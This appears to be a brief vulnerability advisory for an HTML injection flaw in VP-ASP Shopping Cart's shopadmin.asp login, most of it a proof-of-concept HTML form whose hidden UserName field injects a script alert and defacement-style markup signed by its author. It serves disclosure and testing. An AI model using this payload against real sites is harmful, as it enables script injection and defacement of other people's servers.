|
VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
No exploit is required. Proof of concept code has been provided: <TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE> <form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST> <input type=hidden name=UserName value='"><script>alert("Vulnerable server!!! By ConcorDHacK")</script> <b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com> </font> </b>' /> <input type=hidden name=Password size="20" value="123"></td> <input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br> <u>Email</u>: ConcorDHacK@gmail.com<br> <a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a> </form> </body> </HTML> |
|
 Privacy Statement |
